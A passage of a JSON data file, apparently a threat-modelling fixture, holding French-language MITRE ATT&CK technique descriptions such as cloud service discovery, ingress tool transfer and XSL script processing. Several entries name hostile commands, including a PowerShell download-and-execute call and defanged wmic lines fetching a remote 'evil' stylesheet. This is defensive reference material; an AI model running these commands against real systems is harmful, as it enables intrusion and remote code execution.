syst\u00e8me. Les comptes peuvent \u00eatre cr\u00e9\u00e9s sur le syst\u00e8me local ou au sein d\u2019un domaine ou d\u2019un locataire cloud. Dans les environnements cloud, les adversaires peuvent cr\u00e9er des comptes qui n\u2019ont acc\u00e8s qu\u2019\u00e0 des services sp\u00e9cifiques, ce qui peut r\u00e9duire les chances de d\u00e9tection.\nhttps://attack.mitre.org/techniques/T1136\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1526 - D\u00e9couverte des services cloud", - "description": "Un adversaire peut tenter d\u2019\u00e9num\u00e9rer les services cloud ex\u00e9cut\u00e9s sur un syst\u00e8me apr\u00e8s y avoir acc\u00e9d\u00e9. Ces m\u00e9thodes peuvent diff\u00e9rer de la plate-forme en tant que service (PaaS), \u00e0 l\u2019infrastructure en tant que service (IaaS) ou au logiciel en tant que service (SaaS). De nombreux services existent dans les diff\u00e9rents fournisseurs de cloud et peuvent inclure l\u2019int\u00e9gration continue et la livraison continue (CI/CD), les fonctions Lambda, Azure AD, etc. Ils peuvent \u00e9galement inclure des services de s\u00e9curit\u00e9, tels qu\u2019AWS GuardDuty et Microsoft Defender for Cloud, et des services de journalisation, tels qu\u2019AWS CloudTrail et Google Cloud Audit Logs.Les adversaires peuvent tenter de d\u00e9couvrir des informations sur les services activ\u00e9s dans l\u2019environnement. Les outils et API Azure, tels que l\u2019API Azure AD Graph et l\u2019API Azure Resource Manager, peuvent \u00e9num\u00e9rer des ressources et des services, notamment des applications, des groupes d\u2019administration, des ressources et des d\u00e9finitions de strat\u00e9gie, ainsi que leurs relations accessibles par une identit\u00e9. (Citation : Azure - API Resource Manager) (Citation : API Graph Azure AD) Par exemple, Stormspotter est un outil open source permettant d\u2019\u00e9num\u00e9rer et de construire un graphique pour les ressources et services Azure, et Pacu est un framework d\u2019exploitation AWS open source qui prend en charge plusieurs m\u00e9thodes de d\u00e9couverte de services cloud. (Citation: Azure - Stormspotter) (Citation : GitHub Pacu) Les adversaires peuvent utiliser les informations obtenues pour fa\u00e7onner des comportements de suivi, tels que le ciblage de donn\u00e9es ou d\u2019informations d\u2019identification provenant de services \u00e9num\u00e9r\u00e9s ou l\u2019\u00e9vasion des d\u00e9fenses identifi\u00e9es via [D\u00e9sactiver ou modifier les outils](https://attack.mitre.org/techniques/T1562/001) ou [D\u00e9sactiver les journaux cloud](https://attack.mitre.org/techniques/T1562/008).\nhttps://attack.mitre.org/techniques/T1526\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1018 - D\u00e9couverte de syst\u00e8mes distants", - "description": "Les adversaires peuvent tenter d\u2019obtenir une liste d\u2019autres syst\u00e8mes par adresse IP, nom d\u2019h\u00f4te ou autre identifiant logique sur un r\u00e9seau qui peut \u00eatre utilis\u00e9 pour le mouvement lat\u00e9ral \u00e0 partir du syst\u00e8me actuel. Des fonctionnalit\u00e9s peuvent exister dans les outils d\u2019acc\u00e8s \u00e0 distance pour permettre cela, mais des utilitaires disponibles sur le syst\u00e8me d\u2019exploitation peuvent \u00e9galement \u00eatre utilis\u00e9s tels que [Ping](https://attack.mitre.org/software/S0097) ou net view en utilisant [Net](https://attack.mitre.org/software/S0039). Les adversaires peuvent \u00e9galement analyser les donn\u00e9es des fichiers h\u00f4tes locaux (ex: C:\\Windows\\System32\\Drivers\\etc\\hosts ou /etc/hosts) ou d\u2019autres moyens passifs (tels que les entr\u00e9es de cache [Arp](https://attack.mitre.org/software/S0099) locales) afin de d\u00e9couvrir la pr\u00e9sence de syst\u00e8mes distants dans un environnement. Les adversaires peuvent \u00e9galement cibler la d\u00e9couverte de l\u2019infrastructure r\u00e9seau et tirer parti des commandes [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) sur les p\u00e9riph\u00e9riques r\u00e9seau pour recueillir des informations d\u00e9taill\u00e9es sur les syst\u00e8mes d\u2019un r\u00e9seau (par exemple, show cdp neighbors, show arp). (R\u00e9f\u00e9rence : US-CERT-TA18-106A) (R\u00e9f\u00e9rence : CISA AR21-126A FIVEHANDS mai 2021)\nhttps://attack.mitre.org/techniques/T1018\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1046 - D\u00e9couverte du service r\u00e9seau", - "description": "Les adversaires peuvent tenter d\u2019obtenir une liste des services ex\u00e9cut\u00e9s sur des h\u00f4tes distants et des p\u00e9riph\u00e9riques d\u2019infrastructure r\u00e9seau local, y compris ceux qui peuvent \u00eatre vuln\u00e9rables \u00e0 l\u2019exploitation de logiciels \u00e0 distance. Les m\u00e9thodes courantes pour acqu\u00e9rir ces informations incluent les analyses de port et/ou de vuln\u00e9rabilit\u00e9 \u00e0 l\u2019aide d\u2019outils introduits sur un syst\u00e8me. (R\u00e9f\u00e9rence : CISA AR21-126A FIVEHANDS mai 2021) Dans les environnements cloud, les adversaires peuvent tenter de d\u00e9couvrir des services ex\u00e9cut\u00e9s sur d\u2019autres h\u00f4tes cloud. En outre, si l\u2019environnement cloud est connect\u00e9 \u00e0 un environnement local, les adversaires peuvent \u00e9galement \u00eatre en mesure d\u2019identifier les services ex\u00e9cut\u00e9s sur des syst\u00e8mes non cloud. Dans les environnements macOS, les adversaires peuvent utiliser l\u2019application native Bonjour pour d\u00e9couvrir des services ex\u00e9cut\u00e9s sur d\u2019autres h\u00f4tes macOS au sein d\u2019un r\u00e9seau. Le d\u00e9mon Bonjour mDNSResponder enregistre et annonce automatiquement les services enregistr\u00e9s d\u2019un h\u00f4te sur le r\u00e9seau. Par exemple, les adversaires peuvent utiliser une requ\u00eate mDNS (telle que dns-sd -B _ssh._tcp .) pour trouver d\u2019autres syst\u00e8mes diffusant le service ssh. (Citation: apple doco bonjour description) (Citation: macOS APT Activity Bradley)\nhttps://attack.mitre.org/techniques/T1046\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1518 - D\u00e9couverte de logiciels", - "description": "Les adversaires peuvent tenter d\u2019obtenir une liste des logiciels et des versions de logiciels install\u00e9s sur un syst\u00e8me ou dans un environnement cloud. Les adversaires peuvent utiliser les informations de [Software Discovery](https://attack.mitre.org/techniques/T1518) pendant la d\u00e9couverte automatis\u00e9e pour fa\u00e7onner les comportements de suivi, y compris si l\u2019adversaire infecte compl\u00e8tement la cible et/ou tente des actions sp\u00e9cifiques. Les adversaires peuvent tenter d\u2019\u00e9num\u00e9rer un logiciel pour diverses raisons, par exemple pour d\u00e9terminer quelles mesures de s\u00e9curit\u00e9 sont pr\u00e9sentes ou si le syst\u00e8me compromis poss\u00e8de une version du logiciel vuln\u00e9rable \u00e0 [Exploitation pour l\u2019escalade des privil\u00e8ges](https://attack.mitre.org/techniques/T1068).\nhttps://attack.mitre.org/techniques/T1518\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1538 - Tableau de bord du service cloud", - "description": "Un adversaire peut utiliser une interface graphique de tableau de bord de service cloud avec des informations d\u2019identification vol\u00e9es pour obtenir des informations utiles d\u2019un environnement cloud op\u00e9rationnel, telles que des services, des ressources et des fonctionnalit\u00e9s sp\u00e9cifiques. Par exemple, le centre de commande GCP peut \u00eatre utilis\u00e9 pour afficher toutes les ressources, les r\u00e9sultats des risques de s\u00e9curit\u00e9 potentiels et pour ex\u00e9cuter des requ\u00eates suppl\u00e9mentaires, telles que la recherche d\u2019adresses IP publiques et de ports ouverts. (Citation : Tableau de bord du centre de commande Google) Selon la configuration de l\u2019environnement, un adversaire peut \u00eatre en mesure d\u2019\u00e9num\u00e9rer plus d\u2019informations via le tableau de bord graphique qu\u2019une API. Cela permet \u00e0 l\u2019adversaire d\u2019obtenir des informations sans faire de demandes d\u2019API.\nhttps://attack.mitre.org/techniques/T1538\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1622 - \u00c9vasion du d\u00e9bogueur", - "description": "Les adversaires peuvent employer divers moyens pour d\u00e9tecter et \u00e9viter les d\u00e9bogueurs. Les d\u00e9bogueurs sont g\u00e9n\u00e9ralement utilis\u00e9s par les d\u00e9fenseurs pour tracer et/ou analyser l\u2019ex\u00e9cution de charges utiles potentielles de logiciels malveillants. (Citation: ProcessHacker Github) L\u2019\u00e9vasion du d\u00e9bogueur peut inclure des changements de comportement en fonction des r\u00e9sultats des v\u00e9rifications de la pr\u00e9sence d\u2019artefacts indiquant un environnement d\u00e9bogu\u00e9. Comme pour [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497), si l\u2019adversaire d\u00e9tecte un d\u00e9bogueur, il peut modifier son logiciel malveillant pour se d\u00e9sengager de la victime ou dissimuler les fonctions de base de l\u2019implant. Ils peuvent \u00e9galement rechercher des artefacts de d\u00e9bogage avant de larguer des charges utiles secondaires ou suppl\u00e9mentaires. Les v\u00e9rifications sp\u00e9cifiques varient en fonction de la cible et/ou de l\u2019adversaire, mais peuvent impliquer des appels de fonction [API native](https://attack.mitre.org/techniques/T1106) tels que IsDebuggerPresent() et NtQueryInformationProcess(), ou la v\u00e9rification manuelle de l\u2019indicateur BeingDebugged du bloc d\u2019environnement de processus (PEB). D\u2019autres v\u00e9rifications des artefacts de d\u00e9bogage peuvent \u00e9galement chercher \u00e0 \u00e9num\u00e9rer les points d\u2019arr\u00eat mat\u00e9riel, les opcodes d\u2019assemblage d\u2019interruption, les contr\u00f4les de temps ou les mesures si des exceptions sont d\u00e9clench\u00e9es dans le processus actuel (en supposant qu\u2019un d\u00e9bogueur actuel \u00ab \u00c4\u00faswallow \u00bb ou g\u00e8re l\u2019erreur potentielle). (Citation: hasherezade debug) (Citation : AlKhaser Debug) (Citation : d\u00e9bogage vxunderground) Les adversaires peuvent utiliser les informations apprises lors de ces v\u00e9rifications de d\u00e9bogueur lors de la d\u00e9couverte automatis\u00e9e pour fa\u00e7onner les comportements de suivi. Les d\u00e9bogueurs peuvent \u00e9galement \u00eatre contourn\u00e9s en d\u00e9tachant le processus ou en inondant les journaux de d\u00e9bogage de donn\u00e9es sans signification via des messages produits par des appels de fonction [Native API](https://attack.mitre.org/techniques/T1106) tels que OutputDebugStringW(). (Citation : wardle evilquest partii) (Citation: Checkpoint Dridex Jan 2021)\nhttps://attack.mitre.org/techniques/T1622\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1052 - Exfiltration sur milieu physique", - "description": "Les adversaires peuvent tenter d\u2019exfiltrer des donn\u00e9es via un support physique, tel qu\u2019un lecteur amovible. Dans certaines circonstances, telles qu\u2019une compromission du r\u00e9seau \u00e0 air, l\u2019exfiltration peut se produire via un support physique ou un dispositif introduit par un utilisateur. Ces supports peuvent \u00eatre un disque dur externe, une cl\u00e9 USB, un t\u00e9l\u00e9phone cellulaire, un lecteur MP3 ou un autre p\u00e9riph\u00e9rique de stockage et de traitement amovible. Le support physique ou le dispositif pourrait \u00eatre utilis\u00e9 comme point d\u2019exfiltration final ou pour sauter entre des syst\u00e8mes autrement d\u00e9connect\u00e9s.\nhttps://attack.mitre.org/techniques/T1052\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1105 - Transfert d\u2019outils d\u2019entr\u00e9e", - "description": "Les adversaires peuvent transf\u00e9rer des outils ou d\u2019autres fichiers d\u2019un syst\u00e8me externe dans un environnement compromis. Les outils ou les fichiers peuvent \u00eatre copi\u00e9s d\u2019un syst\u00e8me externe contr\u00f4l\u00e9 par l\u2019adversaire vers le r\u00e9seau de la victime via le canal de commande et de contr\u00f4le ou via d\u2019autres protocoles tels que [ftp](https://attack.mitre.org/software/S0095). Une fois pr\u00e9sents, les adversaires peuvent \u00e9galement transf\u00e9rer ou diffuser des outils entre les appareils des victimes dans un environnement compromis (c.-\u00e0-d. [transfert lat\u00e9ral d\u2019outils](https://attack.mitre.org/techniques/T1570)). Les fichiers peuvent \u00e9galement \u00eatre transf\u00e9r\u00e9s \u00e0 l\u2019aide de divers [Service Web](https://attack.mitre.org/techniques/T1102) ainsi que d\u2019outils natifs ou autrement pr\u00e9sents sur le syst\u00e8me victime. (Citation : PTSecurity Cobalt d\u00e9cembre 2016) Sous Windows, les adversaires peuvent utiliser divers utilitaires pour t\u00e9l\u00e9charger des outils, tels que les commandes 'copy', 'finger', [certutil](https://attack.mitre.org/software/S0160) et [PowerShell](https://attack.mitre.org/techniques/T1059/001) telles que IEX(New-Object Net.WebClient).downloadString() et Invoke-WebRequest. Sur les syst\u00e8mes Linux et macOS, une vari\u00e9t\u00e9 d\u2019utilitaires existent \u00e9galement, tels que 'curl', 'scp', 'sftp', 'tftp', 'rsync', 'finger' et 'wget'. (R\u00e9f\u00e9rence : t1105_lolbas)\nhttps://attack.mitre.org/techniques/T1105\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1648 - Ex\u00e9cution sans serveur", - "description": "Les adversaires peuvent abuser des services d\u2019informatique, d\u2019int\u00e9gration et d\u2019automatisation sans serveur pour ex\u00e9cuter du code arbitraire dans des environnements cloud. De nombreux fournisseurs de cloud offrent une vari\u00e9t\u00e9 de ressources sans serveur, notamment des moteurs de calcul, des services d\u2019int\u00e9gration d\u2019applications et des serveurs Web. Les adversaires peuvent abuser de ces ressources de diverses mani\u00e8res pour ex\u00e9cuter des ordres arbitraires. Par exemple, les adversaires peuvent utiliser des fonctions sans serveur pour ex\u00e9cuter du code malveillant, tel que des logiciels malveillants de crypto-minage (c.-\u00e0-d. [Resource Hijacking](https://attack.mitre.org/techniques/T1496)). (Citation: Cado Security Denonia) Les adversaires peuvent \u00e9galement cr\u00e9er des fonctions qui permettent de compromettre davantage l\u2019environnement cloud. Par exemple, un adversaire peut utiliser l\u2019autorisation \u00ab IAM:PassRole \u00bb dans AWS ou l\u2019autorisation \u00ab iam.serviceAccounts.actAs \u00bb dans Google Cloud pour ajouter [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) \u00e0 une fonction cloud sans serveur, qui peut ensuite \u00eatre en mesure d\u2019effectuer des actions que l\u2019utilisateur d\u2019origine ne peut pas. (Citation : Rhino Security Labs AWS Privilege Escalation) (Citation : Rhingo Security Labs GCP Privilege Escalation) Les fonctions sans serveur peuvent \u00e9galement \u00eatre invoqu\u00e9es en r\u00e9ponse \u00e0 des \u00e9v\u00e9nements cloud (c\u2019est-\u00e0-dire [Event Trigger Execution](https://attack.mitre.org/techniques/T1546)), ce qui peut permettre une ex\u00e9cution persistante dans le temps. Par exemple, dans les environnements AWS, un adversaire peut cr\u00e9er une fonction Lambda qui ajoute automatiquement [Informations d\u2019identification cloud suppl\u00e9mentaires](https://attack.mitre.org/techniques/T1098/001) \u00e0 un utilisateur et une r\u00e8gle d\u2019\u00e9v\u00e9nements CloudWatch correspondante qui appelle cette fonction chaque fois qu\u2019un nouvel utilisateur est cr\u00e9\u00e9. (Citation : Backdooring an AWS account) De m\u00eame, un adversaire peut cr\u00e9er un flux de travail Power Automate dans les environnements Office 365 qui transf\u00e8re tous les messages \u00e9lectroniques qu\u2019un utilisateur re\u00e7oit ou cr\u00e9e des liens de partage anonymes chaque fois qu\u2019un utilisateur est autoris\u00e9 \u00e0 acc\u00e9der \u00e0 un document dans SharePoint. (Citation : Varonis Power Automate Data Exfiltration) (R\u00e9f\u00e9rence : Microsoft DART Case Report 001)\nhttps://attack.mitre.org/techniques/T1648\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1484 - Modification de la strat\u00e9gie de domaine", - "description": "Les adversaires peuvent modifier les param\u00e8tres de configuration d\u2019un domaine pour \u00e9chapper aux d\u00e9fenses et/ou augmenter les privil\u00e8ges dans les environnements de domaine. Les domaines fournissent un moyen centralis\u00e9 de g\u00e9rer la fa\u00e7on dont les ressources informatiques (par exemple, les ordinateurs, les comptes d\u2019utilisateurs) peuvent agir et interagir les unes avec les autres sur un r\u00e9seau. La strat\u00e9gie du domaine inclut \u00e9galement des param\u00e8tres de configuration qui peuvent s\u2019appliquer entre les domaines dans un environnement multidomaine/for\u00eat. Les modifications apport\u00e9es aux param\u00e8tres de domaine peuvent inclure la modification des objets de strat\u00e9gie de groupe (GPO) de domaine ou la modification des param\u00e8tres d\u2019approbation pour les domaines, y compris les approbations de f\u00e9d\u00e9ration. Avec des autorisations suffisantes, les adversaires peuvent modifier les param\u00e8tres de strat\u00e9gie de domaine. \u00c9tant donn\u00e9 que les param\u00e8tres de configuration de domaine contr\u00f4lent de nombreuses interactions au sein de l\u2019environnement Active Directory (AD), il existe un grand nombre d\u2019attaques potentielles pouvant d\u00e9couler de cet abus. Des exemples d\u2019abus incluent la modification des objets de strat\u00e9gie de groupe pour pousser une [t\u00e2che planifi\u00e9e](https://attack.mitre.org/techniques/T1053/005) malveillante vers les ordinateurs de l\u2019environnement de domaine(Citation : ADSecurity GPO Persistence 2016)(Citation : Wald0 Guide to GPOs)(Citation : Harmj0y Abusing GPO Permissions) ou la modification des approbations de domaine pour inclure un domaine contr\u00f4l\u00e9 par l\u2019adversaire o\u00f9 elles peuvent contr\u00f4ler les jetons d\u2019acc\u00e8s qui seront ensuite accept\u00e9s par les ressources du domaine victime. (Citation : Microsoft - Conseils aux clients sur les r\u00e9centes cyberattaques d\u2019\u00c9tats-nations) Les adversaires peuvent \u00e9galement modifier les param\u00e8tres de configuration dans l\u2019environnement AD pour impl\u00e9menter un [contr\u00f4leur de domaine non fiable](https://attack.mitre.org/techniques/T1207). Les adversaires peuvent modifier temporairement la strat\u00e9gie de domaine, effectuer une ou plusieurs actions malveillantes, puis annuler la modification pour supprimer les indicateurs suspects.\nhttps://attack.mitre.org/techniques/T1484\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1220 - Traitement des scripts XSL", - "description": "Les adversaires peuvent contourner le contr\u00f4le des applications et masquer l\u2019ex\u00e9cution du code en incorporant des scripts dans des fichiers XSL. Les fichiers XSL (Extensible Stylesheet Language) sont couramment utilis\u00e9s pour d\u00e9crire le traitement et le rendu des donn\u00e9es dans les fichiers XML. Pour prendre en charge les op\u00e9rations complexes, la norme XSL inclut la prise en charge des scripts int\u00e9gr\u00e9s dans diff\u00e9rents langages. (Citation : Microsoft XSLT Script mars 2017) Les adversaires peuvent abuser de cette fonctionnalit\u00e9 pour ex\u00e9cuter des fichiers arbitraires tout en contournant potentiellement le contr\u00f4le de l\u2019application. Semblable \u00e0 [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), le binaire de l\u2019utilitaire de transformation de ligne commune Microsoft (msxsl.exe) (Citation : Microsoft msxsl.exe) peut \u00eatre install\u00e9 et utilis\u00e9 pour ex\u00e9cuter du code JavaScript malveillant incorpor\u00e9 dans des fichiers XSL locaux ou distants (URL r\u00e9f\u00e9renc\u00e9e). (Citation : Penetration Testing Lab MSXSL juillet 2017) \u00c9tant donn\u00e9 que msxsl.exe n\u2019est pas install\u00e9 par d\u00e9faut, un adversaire devra probablement l\u2019empaqueter avec des fichiers supprim\u00e9s. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe prend deux arguments principaux, un fichier source XML et une feuille de style XSL. \u00c9tant donn\u00e9 que le fichier XSL est valide XML, l\u2019adversaire peut appeler le m\u00eame fichier XSL deux fois. Lors de l\u2019utilisation de msxsl.exe adversaires peuvent \u00e9galement donner aux fichiers XML/XSL une extension de fichier arbitraire. (Citation : Contournement XSL mars 2019) Exemples de ligne de commande :(Citation : Penetration Testing Lab MSXSL July 2017)(Citation : XSL Bypass Mar 2019)* msxsl.exe customers[.] script xml[.] xsl* msxsl.exe script[.] Script xsl[.] xsl* msxsl.exe script[.] script jpeg[.] jpegUne autre variante de cette technique, baptis\u00e9e '\u00c4\u00faSquiblytwo\u2019\u00c4\u00f9, consiste \u00e0 utiliser [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) pour appeler JScript ou VBScript dans un fichier XSL. (R\u00e9f\u00e9rence : LOLBAS Wmic) Cette technique peut \u00e9galement ex\u00e9cuter des scripts locaux/distants et, similaire \u00e0 son homologue [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ \u00ab\u00a0Squiblydoo\u00a0\u00bb, exploite un outil Windows int\u00e9gr\u00e9 et fiable. Les adversaires peuvent abuser de n\u2019importe quel alias dans [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) \u00e0 condition d\u2019utiliser le commutateur /FORMAT. (Citation : Contournement XSL mars 2019) Exemples de ligne de commande :(Citation : XSL Bypass Mar 2019)(Citation : LOLBAS Wmic)* Fichier local : wmic process list /FORMAT:evil[.] xsl* Fichier distant: wmic os get /FORMAT:'\u00c4\u00f9https[:]//example[.] com/evil[.] xsl\u2019\u00c4\u00f9\nhttps://attack.mitre.org/techniques/T1220\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1587 - D\u00e9velopper des capacit\u00e9s", - "description": "Les adversaires peuvent d\u00e9velopper des capacit\u00e9s qui peuvent \u00eatre utilis\u00e9es lors du ciblage. Plut\u00f4t que d\u2019acheter, de t\u00e9l\u00e9charger librement ou de voler des capacit\u00e9s, les adversaires peuvent d\u00e9velopper leurs propres capacit\u00e9s en interne. Il s\u2019agit du processus d\u2019identification des exigences de d\u00e9veloppement et de cr\u00e9ation de solutions telles que les logiciels malveillants, les exploits et les certificats auto-sign\u00e9s. Les adversaires peuvent d\u00e9velopper des capacit\u00e9s pour soutenir leurs op\u00e9rations tout au long de nombreuses phases de leur cycle de vie. (Citation : Mandiant APT1) (R\u00e9f\u00e9rence : Kaspersky Sofacy) (Citation : Bitdefender StrongPity juin 2020) (Citation : Talos Promethium juin 2020) Comme pour les efforts l\u00e9gitimes de d\u00e9veloppement, diff\u00e9rents ensembles de comp\u00e9tences peuvent \u00eatre n\u00e9cessaires pour d\u00e9velopper les capacit\u00e9s. Les comp\u00e9tences requises peuvent \u00eatre situ\u00e9es \u00e0 l\u2019interne ou doivent \u00eatre sous-trait\u00e9es. Le recours \u00e0 un entrepreneur peut \u00eatre consid\u00e9r\u00e9 comme une extension des capacit\u00e9s de d\u00e9veloppement de cet adversaire, \u00e0 condition que l\u2019adversaire joue un r\u00f4le dans l\u2019\u00e9laboration des besoins et maintienne un certain degr\u00e9 d\u2019exclusivit\u00e9 de la capacit\u00e9.\nhttps://attack.mitre.org/techniques/T1587\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1008 - Canaux de secours", - "description": "Les adversaires peuvent utiliser des canaux de secours ou des canaux de communication alternatifs si le canal principal est compromis ou inaccessible afin de maintenir un commandement et un contr\u00f4le fiables et d\u2019\u00e9viter les seuils de transfert de donn\u00e9es.\nhttps://attack.mitre.org/techniques/T1008\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1124 - D\u00e9couverte de l\u2019heure syst\u00e8me", - "description": "Un adversaire peut collecter l\u2019heure et/ou le fuseau horaire du syst\u00e8me \u00e0 partir d\u2019un syst\u00e8me local ou distant. L\u2019heure syst\u00e8me est d\u00e9finie et stock\u00e9e par le service de temps Windows dans un domaine pour maintenir la synchronisation de l\u2019heure entre les syst\u00e8mes et les services d\u2019un r\u00e9seau d\u2019entreprise. (R\u00e9f\u00e9rence : MSDN System Time) (R\u00e9f\u00e9rence : Service de temps Windows Technet) Les informations sur l\u2019heure syst\u00e8me peuvent \u00eatre collect\u00e9es de plusieurs fa\u00e7ons, par exemple avec [Net](https://attack.mitre.org/software/S0039) sous Windows en ex\u00e9cutant net time \\\\hostname pour collecter l\u2019heure syst\u00e8me sur un syst\u00e8me distant. Le fuseau horaire de la victime peut \u00e9galement \u00eatre d\u00e9duit de l\u2019heure syst\u00e8me actuelle ou recueilli \u00e0 l\u2019aide de w32tm /tz. (R\u00e9f\u00e9rence : Service de temps Windows Technet) Sur les p\u00e9riph\u00e9riques r\u00e9seau, les commandes [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) telles que \u00ab show clock detail \u00bb peuvent \u00eatre utilis\u00e9es pour afficher la configuration de l\u2019heure actuelle. (R\u00e9f\u00e9rence : show_clock_detail_cisco_cmd) Ces informations peuvent \u00eatre utiles pour ex\u00e9cuter d\u2019autres techniques, telles que l\u2019ex\u00e9cution d\u2019un fichier avec un [T\u00e2che / Travail planifi\u00e9](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 They\u2019re Inside), ou pour d\u00e9couvrir des informations de localit\u00e9 bas\u00e9es sur le fuseau horaire pour aider au ciblage des victimes (c\u2019est-\u00e0-dire [D\u00e9couverte de l\u2019emplacement du syst\u00e8me](https://attack.mitre.org/techniques/T1614)). Les adversaires peuvent \u00e9galement utiliser la connaissance de l\u2019heure syst\u00e8me dans le cadre d\u2019une bombe \u00e0 retardement ou retarder l\u2019ex\u00e9cution jusqu\u2019\u00e0 une date / heure sp\u00e9cifi\u00e9e. (Citation : AnyRun TimeBomb)\nhttps://attack.mitre.org/techniques/T1124\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1556 - Modifier le processus d\u2019authentification", - "description": "Les adversaires peuvent modifier les m\u00e9canismes et les processus d\u2019authentification pour acc\u00e9der aux informations d\u2019identification de l\u2019utilisateur ou permettre un acc\u00e8s autrement injustifi\u00e9 aux comptes. Le processus d\u2019authentification est g\u00e9r\u00e9 par des m\u00e9canismes, tels que le processus LSASS (Local Security Authentication Server) et le Gestionnaire de comptes de s\u00e9curit\u00e9 (SAM) sous Windows, les modules d\u2019authentification enfichables (PAM) sur les syst\u00e8mes Unix et les plug-ins d\u2019autorisation sur les syst\u00e8mes MacOS, responsables de la collecte, du stockage et de la validation des informations d\u2019identification. En modifiant un processus d\u2019authentification, un adversaire peut \u00eatre en mesure de s\u2019authentifier aupr\u00e8s d\u2019un service ou d\u2019un syst\u00e8me sans utiliser [Comptes valides](https://attack.mitre.org/techniques/T1078). Les adversaires peuvent modifier de mani\u00e8re malveillante une partie de ce processus pour r\u00e9v\u00e9ler des informations d\u2019identification ou contourner les m\u00e9canismes d\u2019authentification. Les informations d\u2019identification ou l\u2019acc\u00e8s compromis peuvent \u00eatre utilis\u00e9s pour contourner les contr\u00f4les d\u2019acc\u00e8s plac\u00e9s sur diverses ressources sur les syst\u00e8mes du r\u00e9seau et peuvent m\u00eame \u00eatre utilis\u00e9s pour un acc\u00e8s persistant aux syst\u00e8mes distants et aux services disponibles en externe, tels que les VPN, Outlook Web Access et le Bureau \u00e0 distance.\nhttps://attack.mitre.org/techniques/T1556\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1495 - Corruption du micrologiciel", - "description": "Les adversaires peuvent \u00e9craser ou corrompre le contenu de la m\u00e9moire flash du BIOS syst\u00e8me ou d\u2019autres microprogrammes dans les p\u00e9riph\u00e9riques connect\u00e9s \u00e0 un syst\u00e8me afin de les rendre inutilisables ou incapables de d\u00e9marrer, emp\u00eachant ainsi la disponibilit\u00e9 d\u2019utiliser les p\u00e9riph\u00e9riques et/ou le syst\u00e8me. (R\u00e9f\u00e9rence : Symantec Chernobyl W95. CIH) Le micrologiciel est un logiciel qui est charg\u00e9 et ex\u00e9cut\u00e9 \u00e0 partir d\u2019une m\u00e9moire non volatile sur des p\u00e9riph\u00e9riques mat\u00e9riels afin d\u2019initialiser et de g\u00e9rer les fonctionnalit\u00e9s du p\u00e9riph\u00e9rique. Ces p\u00e9riph\u00e9riques peuvent inclure la carte m\u00e8re, le disque dur ou les cartes vid\u00e9o. En g\u00e9n\u00e9ral, les adversaires peuvent manipuler, \u00e9craser ou corrompre le micrologiciel afin de refuser l\u2019utilisation du syst\u00e8me ou des p\u00e9riph\u00e9riques. Par exemple, la corruption du microprogramme responsable du chargement du syst\u00e8me d\u2019exploitation pour les p\u00e9riph\u00e9riques r\u00e9seau peut rendre les p\u00e9riph\u00e9riques r\u00e9seau inutilisables. (Citation : dhs_threat_to_net_devices) (R\u00e9f\u00e9rence : cisa_malware_orgs_ukraine) Selon l\u2019appareil, cette attaque peut \u00e9galement entra\u00eener [Data Destruction](https://attack.mitre.org/techniques/T1485).\nhttps://attack.mitre.org/techniques/T1495\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1490 - Inhiber la r\u00e9cup\u00e9ration du syst\u00e8me", - "description": "Les adversaires peuvent supprimer ou supprimer les donn\u00e9es int\u00e9gr\u00e9es et d\u00e9sactiver les services con\u00e7us pour faciliter la r\u00e9cup\u00e9ration d\u2019un syst\u00e8me corrompu afin d\u2019emp\u00eacher la r\u00e9cup\u00e9ration. (Citation : Talos Olympic Destroyer 2018) (Citation : FireEye WannaCry 2017) Cela peut refuser l\u2019acc\u00e8s aux sauvegardes et aux options de r\u00e9cup\u00e9ration disponibles. Les syst\u00e8mes d\u2019exploitation peuvent contenir des fonctionnalit\u00e9s qui peuvent aider \u00e0 r\u00e9parer les syst\u00e8mes endommag\u00e9s, telles qu\u2019un catalogue de sauvegarde, des clich\u00e9s instantan\u00e9s de volume et des fonctions de r\u00e9paration automatique. Les adversaires peuvent d\u00e9sactiver ou supprimer les fonctions de r\u00e9cup\u00e9ration du syst\u00e8me pour augmenter les effets de [Data Destruction](https://attack.mitre.org/techniques/T1485) et [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486). (Citation : Talos Olympic Destroyer 2018) (Citation : FireEye WannaCry 2017) En outre, les adversaires peuvent d\u00e9sactiver les notifications de r\u00e9cup\u00e9ration, puis les sauvegardes corrompues. (R\u00e9f\u00e9rence : disable_notif_synology_ransom) Un certain nombre d\u2019utilitaires Windows natifs ont \u00e9t\u00e9 utilis\u00e9s par des adversaires 